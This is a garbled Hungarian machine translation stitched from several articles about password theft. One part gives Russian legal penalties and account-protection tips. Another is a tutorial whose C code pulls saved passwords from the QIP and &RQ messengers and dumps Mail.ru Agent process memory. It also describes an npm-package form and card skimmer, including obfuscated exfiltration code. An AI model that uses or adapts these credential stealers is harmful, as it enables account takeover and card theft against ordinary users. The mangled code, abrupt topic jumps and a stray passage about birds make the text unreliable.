az internet ablakok Android

Ellopja az összes jelszót. A "hackelés" módszerei - A számlák lopása és jelszavai vkontakte

Nem mindenki tudja, hogy a jelszó lopása a szociális hálózaton vagy bármely más online erőforrásban bűncselekmény. Mennyire valóságos az ilyen lopás, milyen büntetés érheti el az elkövetőt, és mit tegyünk, ha áldozat vagy, az alábbiakban elmondjuk.

Mennyire valóságos a jelszó hatalma Vkontakte?

A jelszó felmelegedése meglehetősen valóságos, az ilyen lopás negatív következményeket okozhat a fiók tulajdonosához. Az interneten sok történetet találsz arról, hogy a fiókok becsapódtak a személyes adatok megszerzéséhez, vagy az információ terjesztése, amelyek villognak a tulajdonos hírnevét.

A lopásokat számos különböző módon végzik:

  • adathalászat segítségével: a felhasználó átirányítja a webhely hamis oldalára, ahol felkérik a bejelentkezési és jelszó beírását, amely akkor kapcsolódjon;
  • kombinációk kiválasztásával: Ez a módszer akkor érvényes, ha a jelszó túl egyszerű;
  • az ismerősök vagy ismeretlen emberek csalárd cselekedetei következtében (amikor a kombinációt egyszerűen egy számítógépen vagy okostelefonon kémelték, a modul tulajdonosának hiánya).

Jegyzet!

Függetlenül attól, hogy a támadó cselekvési módja, bűnözéssel büntethető. A bűncselekmény összetétele a művészetben van kialakítva. A büntető törvénykönyv 272 (jogosulatlan hozzáférése a számítógépes információhoz).

Mi van, ha szaggatott?

Ha a szociális hálózaton Vkontakte-nak vagy bármely másnak áldozata lettél, akkor az első dolog, amit meg kell tennie, kapcsolatba lép a támogatási szolgáltatással a fiók blokkolásának kérésére. Talán meg kell adnod néhány bizonyítékot, hogy Ön a profil tulajdonosa.

Ha az ellopott jelszó valahol be van állítva, legyen közösségi hálózatok, email stb. Szükséges, hogy minden más szolgáltatás kombinációját módosítani kell.

Jegyzet!

Számítógépes biztonsági szakemberei nem javasolják telepítése ugyanazt a jelszót különböző helyeken, mivel ilyen esetekben a támadók, akik vette által elfogadott egyik számla könnyen feltörni a többit.

Minden barát, rokona és ismerőse figyelmeztetni kell arra, hogy a profilod feltört. A grealfactors megpróbálhat különböző üzeneteket küldeni az Ön nevében, amely rosszindulatú linkeket vagy segítség kéréseket tartalmaz. Ismerősei szenvedhet, ha úgy vélik, és kattintson a linkre vagy felsorolja a pénzt a számlára az üzenetben megadott vagy mobil számot.

Ha az elkövető intézkedései súlyos károkat okoztak, érdemes alkalmazni a bűnüldöző szervekre. Ehhez meg kell írnia a rendőrségnek nyilatkozatot, amelynek tartalmaznia kell egy kérelmet a behatolók vonzására a művészet alatt. 272. a büntető törvénykönyv. E cikk szerint a jogosulatlan hozzáférést csak akkor kell büntetni, ha az információ:

  • megsemmisült;
  • zárolt;
  • módosított;
  • másolt.

Figyelembe véve azt a tényt, hogy a blokkolás alatt azt jelenti, hogy a törvényes felhasználóknak az adatokhoz való hozzáférésének célzott nehézségét jelentik, a jelszó lopása VC a művészet szankciói alá esik. 272. a büntető törvénykönyv.

Ilyen cselekmények esetén a következő típusú büntetést biztosítják:

  • legfeljebb 200 000 rubel (vagy az elkövető bérének összege 18 hónapig);
  • korrekciós munka legfeljebb 1 évig;
  • a szabadság, a kényszermunka vagy a szabadságvesztés legfeljebb 2 évig történő korlátozása.

Az ügy megfontolásakor a Bíróság eldönti, hogy az egyik ilyen mondat kinevez. Ez függ, beleértve a számla tulajdonosának és más személyeknek okozott kárfokot is. Ha nagy károkat okoztak (több mint 1 000 000 rubel), a bírság mérete 300 000 rubelre emelkedhet, és a bebörtönzés időtartama legfeljebb 4 év.

Jegyzet!

Nagy károkat okozhat a kereskedelmi vállalati fiók betörése esetén. Ilyen helyzetekben a védelemre is mehetünk Üzleti hírnéva támadók eredményeként szenvedtek.

Hogyan védjük meg magad a jelszó lopásától?

Jól meghatározott és érthető szabályok vannak a lopás elleni védelem érdekében:

  • ne használja túl egyszerű kombinációk, különösen a születési, név és vezetéknév, stb. Nagyon könnyű hack. Nos, ha a jelszó egy összeegyeztethetetlen betűkből, számokból, több írásjelekből áll;
  • ne menjen gyanús linkekre, ne adja meg adatait a gyanús webhelyekre;
  • ne takarítsa meg jelszavát az ismeretlen eszközökön, és ne tartsa meg a böngészőkben;
  • próbálja meg, hogy ne adja meg fiókjait a nyilvános Wi-Fi hálózatokból;
  • ha lehetséges, használja a jelszavak tárolását, mint a tartók.

Ha már behatolók áldozatává vált, segítséget kérünk ügyvédeinknek. Segítenek minden szakaszban, kezdve a rendőrség nyilatkozatának előkészítésével és irányával, és végződnek a tárgyaláson. Hívjon minket, vagy hagyja el az üzenetet az oldalon.

Néha megragadom a szoftverfejlesztők gondatlanságát. És az adatok titkosítva vannak, és az új algoritmusok, és a programjaik védettek a hackelésből, de nem hozhatja az előnyöket.

Bármely többé-kevésbé fejlett felhasználó tudja, hogy a lemezen lévő jelszavak tárolása nem biztonságos. A jelszavak legmegbízhatóbb tárolása fej. Ugyanakkor a felhasználói felhatalmazást igénylő programok többsége lehetővé teszi a programban lévő jelszót, hogy felgyorsítsa a jövőbeni bejelentkezési folyamatot. A fejlesztők végre ezt a funkciót különböző módokon - valaki tárolja a jelszót a beállításokat tartalmazó fájlokat, hogy valaki a registry, hogy valaki a Windows biztonságos tároló (ugyanazt a regisztrációs, de megfizethető csak a rendszer SYSTEM). Súly tárolási lehetőségek. Mindazonáltal, mint például a jelszavak lopásának módszerei. Sok van rosszindulatú programok, fő vagy kiegészítő funkció
ami a mentett jelszavak lopása tól től merevlemez áldozatok.

Mi, mert veled, fejlett felhasználók, igaz? És ezért soha nem mentünk el a jelszavakat, de csak emlékszel. A kijelentés igaz, hogy ebben az esetben a biztonsági jelszónk? Nézzük meg.

Mire van szükségünk?

  1. Spy ++ az MS csomagból Vizuális Stúdió.vagy bármilyen ilyen segédprogram.
  2. PE-szerszámok, vagy bármilyen segédprogram, amely lehetővé teszi, hogy egy folyamat dump.
  3. Hex Workshop vagy bármely más hexadecimális szerkesztő.
  4. MS Visual C ++ vagy bármely C fordító.

Mit fogunk felfedezni?

  1. Qip.. Van BILD 8040. (QIP.RU)
  2. & RQ.. A 0.9.7.4-es verziót használtam. (Andrq.org)
  3. Páncélügynök. 5.0 verzió, Build 2082. (Agent.mail.ru)

Hacking jelszavak QIP.

Ingyenes internetes pager, írt és támogatta az orosz programozó. W. Qip. Több millió rajongó, aki szereti őt a kényelemért, egy csomó bőrt és sok más hasznos funkciót.
Ha nincs ez az ICQ ügyfél - előre a fejlesztő honlapja utolsó verzió. Telepítés, futtatás.

A megnyitott ablak azt javasolja, hogy adja meg az engedélyezési adatokat, vagy kezdjen egy újat számla. Nem számít, hogy regisztrálsz-e új fiók, Vagy megy a hitelesítő adatokkal. Továbblépni.

Qip. Kérjük, hogy mentse a jelszót. Nem fogjuk megmenteni a jelszót. Hagyja el Qip. Egyedül és nyissa meg a Spy ++ -t. Kattintson az Alt + F3 elemre, és nyissa meg az ablakkeresési párbeszédablakot. Vegye ki a kereső eszközt az egérrel, és dobja a fiókkezelő ablakban Qip.'de.

Kattintson az OK és a SPY ++ gombra az ablakban az ablakban az ablakot - "Qip - csendes kommunikáció!", Melyik osztálynév TMANFORM. Rajta, a gyermek ablakai fája, amely interfészt biztosít a kiszolgálóhoz való csatlakozáshoz. Mi érdekli a TGRUPBOX, a TCUBBOBOX rajta és Tedit. Ez csak az UIN és a jelszó. Emlékszünk az osztályok nevére.

Menj vissza az ablakba Qip. És kattintson a Connect gombra.

A beviteli párbeszédablak zárva. Tudsz kommunikálni. De ellenőrizze, hogy a párbeszédablak zárva van-e? Frissítse az ablakok listáját a SPY ++ (KEY F5), és próbálja meg újra megtalálni az engedélyezési ablakot. Qip.. Kattintson az Alt + F3 elemre, és írja be a keresési paramétereket. Az ablak megkereséséhez legalább egy paramétert kell megadnunk: a fogantyú egy egyedi ablakazonosító, felirat - formanyomtatvány, osztály - ablak osztály neve. Osztály szerint keresünk.

A TMANFORM ablakosztályba lépünk az osztály mezőben. Kattintson az OK gombra.

Mit látunk? Az ablak nem zárult le. Ez csak láthatatlan ... Próbáljuk olvasni az engedélyezési adatokkal rendelkező mezőket. Ehhez használja az ablakok és rendszerek kommunikációjára szolgáló szabványos mechanizmust a Windows - üzenetekben.

Elkezdjük a programozást.

Void Main ()
{
//
HWND HMANFORM, HGROUPBOX, HEDIT, HOMBOBOX; //
Azonosítók formák
char * puin; // Mutató az uin pufferhez
char * pass; // Jelszó puffer mutatója
int Iuin; // hossza UIN.
int ipass; // Jelszó hosszúság

// Keresse meg az engedélyezési párbeszédablakot
Hmanform \u003d findwindow ("tmanform", 0);
//
A vezérlők csoportja
hgroupbox \u003d findwindowex (Hmanform, 0, "tgroupbox", 0);

// lista az UIN "AMI-vel
Hccombobox \u003d findwindowex (hgroupbox, 0, "tcombobox", 0);
//
A szövegben a szöveg hosszát kapjuk
Iuin \u003d SendMessage (hccombobox, wm_gettextlengnth, 0, 0) +1;
//
Válassza ki a szükséges memóriát a pufferhez
Puin \u003d (char *) lokalalloc (0, iuin);
//
Közvetlenül szöveget kapunk
Sendmessage (hccombobox, wm_gettext, iuin, (hosszú) puin);

// mező jelszóval
Hedit \u003d findwindowex (hgroupbox, 0, "tedit", 0);
//
Továbbá analógiával az uin "ohm

pass \u003d (char *) lokalalloc (0, ipass);

//Adjuk ki, mi történt
Cout.<< "[!!!]Found for: "<< pUIN << "\tPassword: " << pPass;

// Szabad memória
Localfree (Puin);
Localfree (pass);
}

Mentés, fordított, futtatunk. Mit csináltunk? Ha minden rendben van, akkor a program visszaadja a tartalmat tartalmazó karakterláncot az uin és a jelszó.

Meg kell jegyezni, hogy ha elkezdjük Qip.amelyben a "Mentés jelszó" opció korábban telepítve volt, akkor ez a jelszó megszerzésének módja nem működik, mert a szöveg a jelszó mezőben van "<:HIDDEN:>"Úgy tűnik, a fejlesztő, a fül széle még mindig hallott a biztonságról.

Hacking jelszavak és rq

Szintén szabad és nem kevésbé népszerű, mint Qip., Az ICQ-kliens, amelyet szeretettel "patkánynak" neveznek. A patkány támogatja a bővítményeket, a bőröket és a fejlesztői közösség támogatja.

Swing az utolsó stabil verziót az Offsite-ről, és kezdje el a tanulmányt.

Elindítás után & RQ. Hívja meg nekünk egy új profil létrehozásához, amelyre meg kell adnia az UIN-t, vagy regisztrálnia kell egy újat. Ezután javasoljuk, hogy válassza ki az interfész nyelvét, és a program biztonságosan kezdődik. Annak érdekében, hogy a patkány csatlakozzon a kiszolgálóhoz, ki kell választania az "Online" állapotot. A program jelszót kér és csatlakozik. Megadhatja azt a programot, amelyre automatikusan csatlakozni, ha elindul, akkor a "Futtatás" keretben a "Connect" -t a Beállítások (Alt + P) be kell tartania. Ez nem kötelező. Számunkra fontos a "Nincs megadva a jelszó mentése" opció, a "Biztonság" kategóriába. Kiállítás.

Menjen a "Csatlakozás" keretbe. Mi figyelemre méltó számunkra ez a kategória? Az a tény, hogy van egy "jelszó" mező. Emlékszünk erre a körülményre. Bezárom a patkányt.

Megint megnyitom. A csatlakozáshoz meg kell adnunk a jelszót, mert beállíthatjuk az opciót "Ne mentse meg a jelszót." Bemutatjuk a jelszót, csatlakozunk. Hívja újra a Beállítások párbeszédablakot. Meglepő módon a "Jelszó" mező szöveget tartalmaz. Ez a jelszavunk? Jelölje be.

A SPY ++ segédprogram használatával tanulja meg az ablakok nevét & RQ.És indítsuk el az írási kódot.

Void Main ()
{
// Nyugdtassuk meg a munkához szükséges változókat
Hwnd hmainfrm, hpfefrm, hpanel, hconnectionfr, hedit; //
Azonosítók formák
char * puin; // Mutató az uin pufferhez
char * pass; // Jelszó puffer mutatója
int Iuin; // hossza UIN.
int ipass; // Jelszó hosszúság

// Főablak & RQ. Ettől fogunk kapni uint
Hmainfrm \u003d findwindow ("tmainfrm", 0);
//
A szöveg hossza
Iuin \u003d SendMessage (hmainfrm, wm_gettextlength, 0, 0) +1;
//
Válassza ki a puffert
Puin \u003d (char *) lokalalloc (0, iuin);
//
A főablak fejét kapjuk - ez uin
Getwindowtext (hmainfrm, puin, iuin);

/*
Figyelembe kell venni, hogy amikor kezdő és rq, a Beállítások ablak
Nem nyílik meg a főablakkal. De mi van velünk
megakadályozza, hogy megnyitja? Különösen azért, mert kedvesek vagyunk
A gyorsbillentyűk használata (Alt + P). Itt
És nyomja meg őket.

*/
// Alt + P emuláció - gyorsbillentyű a beállítások ablakához
Sendmessage (hmainfrm, wm_syskeydown, "p", 0x20000000);
Sendmessage (hmainfrm, wm_syskeyup, "p", 0x20000000);

// Megtaláljuk a Beállítások ablakot
hpffrm \u003d findwindow ("tprefrm", 0);
//
Panel beállítási kategóriákkal
hpanel \u003d findwindowex (HPFFRM, 0, "TPANEL", 0);
//
Keret csatlakozási beállításokkal
Hconnectionfr \u003d findwindowex (hpanel, 0, "tconnectionfr", 0);
//
Jelszóval rendelkező mező
Hedit \u003d findwindowex (hconnectionfr, 0, "tedit", 0);

// Jelszó hosszúság
ipass \u003d sendmessage (hedit, wm_gettextlength, 0, 0) +1;
//
Válassza ki a puffert
pass \u003d (char *) lokalalloc (0, ipass);
//
Jelszót kapunk
SendMessage (Hedit, WM_GETTEXT, IPASS, (hosszú) pass);

// Az eredmény megjelenítése
Cout.<< "[!!!]Found for: "<< pUIN << "\tPassword: " << pPass;

// Szabad memória
Localfree (Puin);
Localfree (pass);
}

A program végrehajtása után győződjön meg róla, hogy ez a példa működik. Megvan a jelszavunk. Ugyanakkor, ha Qip. A lemezen lévő jelszó megmentése esetén elrejti a jelszót & RQ. Nem érdekli, hogyan vezették be a jelszót. A Beállítások ablakban mindig észlelhető a jelszó.

Az egyetlen árnyalat az, hogy & RQ. A kezdet után nem nyitja meg a Beállítások ablakot, bár ha a beállítások megnyitása után a bezárás után nem záródott le, de egyszerűen láthatatlanná válik. A forráskódban a gyorsbillentyűt használtuk, hogy biztos legyen benne, hogy a Beállítások ablak nyitva van.

Hacking jelszavak Mail.ru Agent

A Társaság által nyújtott hálózatban való kommunikáció másik eszköze Mail.ru.. Saját protokollon működik, lehetőség van a hangkommunikációra a külső telefonszámokhoz való hozzáféréssel. Van egy csomó lehetősége, és ennek megfelelően rajongói, akik naponta élvezik őket.

Esetében Páncélügynök Egy másik megközelítést fogunk használni. Egy kicsit bonyolultabb, de nem kevésbé hatékony. Nézze meg a Windows-ot, amit nem fogunk. Próbáljunk meg egy jelszót találni a folyamat memóriájában.

Tehát swing, telepítjük, regisztrálunk, ha szüksége van és fut.

Az ügynök számos felhasználói fiókot támogat, és listájuk tárolása a rendszerleíró adatbázisban. A HKEY_CURRENT_USER \\ SOFTWARE \\ mail.RU \\ agent \\ Magent_logins Branch, ez sok reg_binary paramétert hoz létre, hány fiókot regisztráltak a helyi számítógépen. A kulcsokat az alábbiak szerint hívják: NNN # your_email_adress, ahol az NNN a fiók rendelési száma.

Nézzük meg, hogy az e-mail cím a memóriában van-e. Ehhez használja a PE-eszközök segédprogramot, amely lehetővé teszi, hogy egy folyamatbillentyűt készítsen.

Mentse el a dumpot, töltsük be a hex műhelybe. A keresési párbeszédablak megnyitásához kattintson a Ctrl + F gombra. Válassza ki a szöveges karakterlánc módot, és adja meg e-mail címünket az érték mezőben. Kattintson az OK gombra, és a szerkesztő a talált szöveget hozzárendeli. Már észrevette? Az e-mail cím 4 bájtja után jelszó! Mi ez a 4 byte? Ez egy 32 bites jelszó hossza. Az e-mail címnek is van hossza. Ez minden, csak a keresési folyamat automatizálására szolgál, mint amit meg fogunk tenni.

// A függvény visszaadja a Magent.exe folyamat fogantyúját
Kezelje a getprocess ()
{
Kezelje a hprocesssnap; //
Kezelje a pillanatfelvétel folyamatait
Processentry32 PE32; // A folyamatinformációkat tartalmazó szerkezet

// Képet készítünk a folyamatokról
Hprocesssnap \u003d createtoolhelp32snapshot (th32cs_snapprocess, 0);
Ha (HProcesssnap \u003d\u003d Invalid_handle_Value) 0;
Pe32.dwsize \u003d sizeof (PROCESSENTRY32);
//
Átmegyünk a képen
Ha (! PROCESS32FIRST (HProCESNAP, & PE32)) (közel helyzet (HProcesssnap); 0;
tegye.
{
//
Hasonlítsa össze a fájlnevet a magent.exe segítségével
Ha (! Lstrcmp (strupr ("magent.exe"), strupr (& pe32.szexefile))))))))))))))
{
//
Megtalálta a kívánt folyamatot, visszatérítheti neki a fogantyút
Visszatérés az OpenProcess (PROCESS_ALL_ACCESS, FALSE, PE32.TH32PROCESSID);
}
) Míg (folyamat32NEXT (HProcessnap és PE32));
//
Zárja be a folyamatok pillanatképét
Közeli helyzet (hprocessznap);
Vissza 0;
}

void Main ()
{
HKEY HEY; // Rendszerleíró kulcs azonosító
DWORD I, T, RECODE, CVALUES \u003d 256; //
Szükséges közbenső változók
Char regvalue; //
Rendszerleíró kulcs olvasási puffer
DWORD CCHVALUE \u003d 1024; //
Puffer méret
Kezelje a hprocess; // kezelési folyamat
Char Szemail; //
E-mail címek pufferjei
int Iemail; // hossza e-mail címek
Hmodule hmodule; // fogantyúmodul
Modulinfo modinfo; // A modul információtartalma
Dword dwreded; // A folyamatbájtok száma
char Szpass; // Puffer a jelszóhoz
Bool talált; // Flag Found / Not Found Password
char * ptmp; // Ideiglenes puffer

hprocess \u003d getprocess ();
Ha (HProcess)
{
//
Fogantyúmot kapunk a fogantyúval,
// amelyre átmenetileg új patakat hozunk létre
Fogantyú HELREAD \u003d Createremotethread (HProcess, NULL, 0,
(Lpthread_start_routine) getmodulehandle, , 0, null);
WAITFORSINGLEOBEJEOBECT (HTTHREAD, INFINITE);
GethreadCodethread (Htthread, (LPDWord) és hmodule);
Közeli helyzet (herthread);

// Információt kapunk a betöltött modulról
Getmoduleinformation (HProcess, hmodule, & modinfo, sizeof (modulinfo));

// Dump puffer
PBYTE PBUFFER \u003d Új byte;
//
Olvastuk a hulladékot
Readprocessmemory (hprocess, modinfo.lpbaseofdll, pbuffer,
modinfo.sizeofimage, & dwreaded);
Ha (DwREADED\u003e 0)
{
//
Nyissa meg a rendszerleíró kulcsot
Ha (regopenkeex (HKEY_CURRENT_USER, "Software \\\\ mail.ru \\\\ ügynök
\\\\ Magent_logins ", 0, Key_Query_Value, & HKEY) \u003d\u003d ERROR_SUCCESS) \u003d\u003d ERROR_SUCCESS)
{
Mert (t \u003d 0, retcode \u003d error_success; t< cValues; t++)
{
//
A rendszerleíró kulcs beállításainak sorában bekapcsoljuk az e-mail keresési dumpot
Retcode \u003d regenumvalue (HKEY, T, REGVALUE, & CCHVALUE, NULL, NULL, NULL, NULL);
ha (retcode \u003d\u003d error_success)
{
//
Az első paraméter neve 4 bájt egy szám, átugorjuk. Ezután jön a cím.
Lstrcy (Szemail, (CONST Char *) és regvalue);
Iemail \u003d lstlen (Szemail);
//
Kiemeljük a puffert, amelyben a kompatibilis lerakó területeket fogjuk tenni
Ptmp \u003d (char *) lokalalloc (0, Iemail);
Talált \u003d FALSE;
//
Dump
mert (i \u003d 0; i {
Ha (Talált) (i \u003d dwreaded;) //
Vége túlterület
// Vegyünk egy másik dumpot az összehasonlításhoz
Memcy (& PTMP, & PBUFFER [I], IEMAIL);
//
Összehasonlítás
Ha (! Memcmp (& PTMP, SZEMAIL, IEMAIL))
{
//
A cím után 4 bájt után jelszó van.
Memcy (Szellpass, és PBuffer, Sizeof (Szells));
//
Található jelszó. Az eredmény megjelenítése.
Cout.<< "[!!!]Found for: " << szEmail << "\tPassword: " << szPass;
Talált \u003d igaz;
}
}
Localfree (PTMP);
}
}
Regclosey (HKEY);
}
}
}
}

Teljes, futtassa, kapjon jelszót. Minden egyszerű.

Következtetés

Mit lehet kötni? Még ha nem tárolunk bizalmas információkat a merevlemezen, sebezhető. Mindig megtalálhatsz egy csomó módot, hogy zárt információt kapjon, és ezek közül sok ilyen módon olyan egyszerű és váratlan lesz, hogy mindenki felismeri őket. Csak a nem szabványos gondolkodásra van szükség, és mindenki kiderül.

A fenti példák mindegyike arra irányul, hogy vonzza a programfejlesztők nagyobb figyelmét az információbiztonság problémájához. A szerző által megadott kód nem igényel egyedülállóságot és sokoldalúságot, azonban az információ megszerzésének elve számos szoftver termékre vonatkozik.

Például módosítható, de erősen ajánlott csak oktatási célokra.

Mi a támadók nem mennek, hogy a támadók ne menjenek ellopni jelszavakat mindenféle hálózati erőforrás - oldalak a közösségi hálózatok, online játékok, fizetési rendszerek. A személyes adatok lopásának statisztikája a peste hálózatán a riasztó számjegyek. Annak érdekében, hogy ne legyenek olyan áldozatok közé tartoznak, akik elveszítették számlájukat, fontolja meg a hackerek által használt jelszavak lopásának főbb módszereit, és. Ezeknek a rosszindulatú "technológiáknak" elképzelése, hogy megzavarhatják a személyes adatok biztonságának és titkosságának megfelelő szintjét.

Az igazságosság és a gyújtás diadalása az etetési időszak alatt történik. Malyura csibék, elrejtve a szülőket, közeledve a fészek édességek a csőrben, elkezdi az erejét a józan, a nagyon trillnek, amelyet az élet első napjaiban énekelnek. Élelmiszerek megszerzése, csak az "natív motívum" előadói jogi örökösek, és a csaj csibék maradnak valami hamarosan az éhség.

Első pillantásra a természet égő képe, hanem úgy néz ki, mint az internet digitális dzsungelének végtelen kiterjedései: és vannak jelszavak; És vannak karakterek - gonosz és kedves - hackerek és hétköznapi felhasználók.

Szóval, egy kedves olvasó, hogy megmentse a megmentett jelszavakat és jelszavakat, a szubszinátból, persze, hogy nem kell látni. De megismerkedni a személyes adatok elrablásának módjaival, ez nem lesz túlságosan felesleges ... Szeretne a világot? Készülj fel a háborúra!

A támadó fő eszközei Ebben a módszerben a felhasználó naivság és túlzott kíváncsisága. Nincs kifinomult szoftver módszer, ravasz vírusok és más hacker technológiák.

A Villain, tudva csak a postafiókból való bejelentkezés, bemutatja azt a bejelentkezési űrlaphoz. Majd tájékoztatja a jelszót, amely elfelejtette a jelszót. A monitor kiemeli a vizsgálati kérdést - a hacker nem tudja a választ neki, de már ismeri a tartalmát. Ez az, ahol a legtöbb „érdekes” kezdődik: alapján a téma a kérdést, azt elküldi az áldozat egy „trükkös betű”, amelyben a helyes választ próbál a fátyolos formában. A rejtélyes üzenet úgy néz ki, mint ez: "Jó nap! Mi, a kulináris helyszín ilyen, ..... stb. És mi a kedvenc ételed? És ez csak egy külön példa. E fajta "séták a hálózaton keresztül" Nagy mn zhenya . Egy cikket írtunk a szociális mérnökökről a szociális tervezésről. Tehát nézd meg mindkettőt, olvasás leveleket!

Főzés cookie (cookie)

Cookie-k (angol nyelvről. Cookie - cookie-k) - olyan fájl, ahol a webhely a felhasználó böngészőjében ment. Benne van egy megrázott formában, bejelentkezési, jelszó, azonosító és egyéb információk tárolva, amelyre az erőforrás időszakosan utal az online munka során.

Hacker, egy adott webhely sérülékenységének ismerete (fórum, postai szolgáltatás, szociális hálózat), írjon egy speciális szkriptet, amely "húzza" cookie-kat az áldozat böngészőjéből, és elküldi neki. A számlatulajdonos részvétele nélkül ez a "fekete eset" nem kerül költségre, mivel ő kell elindítani egy rosszindulatú parancsfájlt. Ezért a kód, a szállítás előtt egy speciális "csali": a képen, betűvel, kérés stb. A fő feladat az, hogy az áldozat a javasolt linkre lép. És ha ez megtörténik, a böngészőből a hacker script szakácsja a harmadik féltől származó hostingen telepített Sniffer (Interceptor hálózati forgalmat) továbbítja. És csak akkor irányítja a felhasználót, ahol megígérte a jelentésben - a dating site, video hosting, fotóalbum, stb.

Ha egy hackeret hagynunk Bruthet használatával, orrával, komplex jelszavakat hozhat létre, használja.

A jelszó lopás megfosztja az oldalához való hozzáférést, vagy kerekített összeg nélkül hagyhatja el - itt van, a támadó boldogsága.

Fontolja meg érdekes módon, hogy a jelszó lopás sikeresen megvalósítható legyen.

A jelszó vagy a hitelkártyaszám megtalálása sokféleképpen. Ezután megvitatjuk, hogy ez hogyan történik ezzel a kód az NPM csomagban.

A rosszindulatú kód, amely minden piszkos munkát végez, keresi a következő böngészőoldalt:

  • bármilyen formanyomtatvány;
  • a cím címében szereplő elem megtalálható a "Jelszó", "CardNumber", "CVC", "CHECKOUT" és így tovább.

Ha a Submit esemény után megtalálható, a keresési információ megtalálható, van valami, amellyel az oldalon használható.

  • Az információk minden formájából az információt kivonat: ( dokumentum.Forms.foreach (...));
  • a "cookie-kat" gyűjtünk: document.cookie;
  • mindezek az üzlet mindig véletlenszerű vonalba fordulnak: cONST PAYLOAD \u003d BTOA (JSON.STRINGINIFY (SENSITICEUSERDATA)));
  • És utána, a közbülső gazdaszervezethez megy: https://legit-nalytics.com?q\u003d$ (Viewload);
  • És ha van hasznos - elküldve a hacker kiszolgálóra.

Invertálja a világot

Annak érdekében, hogy ezt a boldogságot közzé kell tenni, valahogy kényszerítenie kell a kódot a potenciális donor webhelyekre. Megpróbálhatsz megszakítani a böngészők bővítését, de ez nem olyan hatékony. A kereszttípusú parancsfájl jó lehetőség, de ő (az XSS-ben) saját biztonsági protokollokkal rendelkezik, és ismét nem azok a mérlegek. Az NPM sokkal jobban megfelel.

Meg tudod találni egy csomagot, amely megváltoztatja a konzol konvekciós szín színét a böngészőben.

A "hasznos" frissítésnek a függőségein való felvételére kényszeríti, a kihúzás segítségével több (bármilyen) meglévő csomagot a hálózaton, és várjon.

Egy hónap alatt 120000 letöltés van a frissítésről és a kódex végrehajtása több mint 1000 webhelyre. Természetesen ez nem csodaszer, és a valószínűsége nagyszerű, hogy az efemerális csomagfrissítés nem fogadható el nyitott karokkal, de biztonságos, és van esély arra, hogy nem fognak gyorsan varrni.

Vagy talán egy kanál kátrány?

Sima és szépnek hangzik, de vannak olyan kérdések, amelyek megjelenhetnek a szándékos olvasónál, és debunknak kell lenniük.

Script hálózati kérések - A kód nem küld semmit, azaz nincs állandó forgalom cseréje. Az összeszerelt anyag összeszorítása 19: 00-7: 00 között zajlik, amikor a biztonsági tisztek és más tesztelők már nem tesztelik. Még ha a tesztelő is akarja megkülönböztetni magát, a kód helyettesíti az URL-t a „bal”, hasonló a szociális hálózatok, és a szállítmány mindig történik különböző időpontokban: ez a meglepetés.

Az "furcsaságok" keresése NPM-ben. Sok szerencsét! Az ideiglenes és az erőforrás költségek összehasonlíthatatlanok, nos, ha van valami, akkor nincs tipp a kódban a letöltés, az xmlhttpequest vagy a fogadó cím, amelyhez mindent elküldünk.

cONST I \u003d "gfudi"; CONST K \u003d S \u003d\u003e S.SPLIT (""). Térkép (c \u003d\u003e string.fromcharcode (c.charcodeat () - 1)). Csatlakozás (""); Én (urlwithyourpreciocidata);

cONST I \u003d "gfudi";

const k \u003d s \u003d\u003e s. Hasított ("). Térkép (c \u003d\u003e string. CHARCODE (C. CHARCODEAT () - 1)). Csatlakozzon ("");

Önálló [k (i)] (URLWITHYOURPRECUCHUNDATA);

A "gfudi" egy lekér, de az egyikenkénti betűkkel, és az én pedig az álnév ablak. Nem használt semmit szokás, mint a letöltés. Ehelyett bárhol is lehet, az Eventsource (UrlvavivabyDent) alkalmazása. Még akkor is, ha a forgalom meghallgatja a szerviz-y-t, senki sem fog gyanítania semmit, mert semmi sem kerül elküldésre a szolgáltatásokat támogató böngészőkben.

A CSP védelmet használva. A CSP szempontjából a kódex nem tesz semmit tiltott, kivéve, hogy adatokat küldjön valamilyen tartományra. Igen, a CSP jól ütközik az XSS támadásokkal, és korlátozhatja a böngésző kommunikációját a külvilággal, de a szkript cselekedetei nem annyira nagyok, hogy elemezzen valamit.

cONST LINKEL \u003d DOKUMENTUM.CREATEELMENT ("LINK"); linkel.rel \u003d "prefetch"; Linkel.href \u003d URLWITHYOURPRECICHUNDATA; document.head.appendchild (linkel);

cONST LINKEL \u003d dokumentum. Createelement ("Link");

linkel. Rel \u003d "prefetch";

linkel. Href \u003d urlwithyourpreciocidata;

dokumentum. Fej. Appendchild (linkel);

Annak érdekében, hogy ne fizessen a hackelésért, ellenőriznie kell a CSP-t egy működő blokkoló rendszer (Connect-Src) és a Interceptor eszköz (alapértelmezett-src) jelenlétére. Ezt megteheti:

JavaScript.

fetch (document.href) .then (resp \u003d\u003e (const cp \u003d resp.headers.get); // Megnézzük a CSP munkáit));

Az első alkalommal kell ellenőriznie, hogy a felhasználó és más vágyók nem gyanakodnak semmit.

Hol futhat most?

Most gondolkodunk a felhasználó vagy a fejlesztő arcáról: "Minden rossz, jelszavaink már sötétben vannak!" A kudarc elkerülése érdekében lehetetlen NPM-t használni az űrlapokkal és más gyűjtőelemekkel ellátott oldalakon. A harmadik féltől származó reklámokat, a Google Tag Manager, a diagramok, az analitika szkriptjeit, az elemzést nem szabad, különben nem lehet injekciót kaphat. Ez csak az oldalakra vonatkozik, ahol a felhasználó bemutat valamit, a helyszín többi része biztonságosan működhet a React-E-en, és nem aggódhat.

Szüksége van egy külön oldalra, amelynek nincs semmi felesleges és már gyűjtött hitelkártyaszámok, jelszavak és hitelesítő adatok Iframe.

A jelszó lopás az adathalászat segítségével történik (elfelejtve ezt a webhely fertőzött példányát). Ha egy hacker képes lenne birtokolni a postafiókját, akkor kiáltottuk az összes regisztrációs és bankszámlát, amely e-mailhez kötött. 2017-re 12 millió fiókot szaporítottak.

Nagyon sikeres és keylogery - 1 millió felhasználó szenvedett, pontosan a malikress miatt.

Következtetés

Egy cikk, hogy lehetetlen bízni senkiben, és hagyja abba az ismert sebezhetőségekkel rendelkező webhelyet, hiszen a világon hatalmas számú ember hajlandó valami értékeset élvezni. Bármely webhely sérülékeny, és ezeknek a rudaknak a listája folyamatosan változik: Ne felejtsd el tartani a kezét az impulzusra.

A programozó könyvtárának orosz fordítása.



igazibörtönben!

Próbáljuk meg kitalálni, hogy hogyan lehet ellopni a jelszavakat a számítógépről, ha hozzáférhet hozzá, de hogy az áldozat ne gyanítson semmit.

Az egyik módja annak, hogy létrehozzunk egy speciális flash meghajtót olyan segédprogramokkal, amelyek jelszavakat húzhatnak a böngészőkből és más programokból, amelyek menthetnek a jelszavakat a felhasználó kényelméhez.

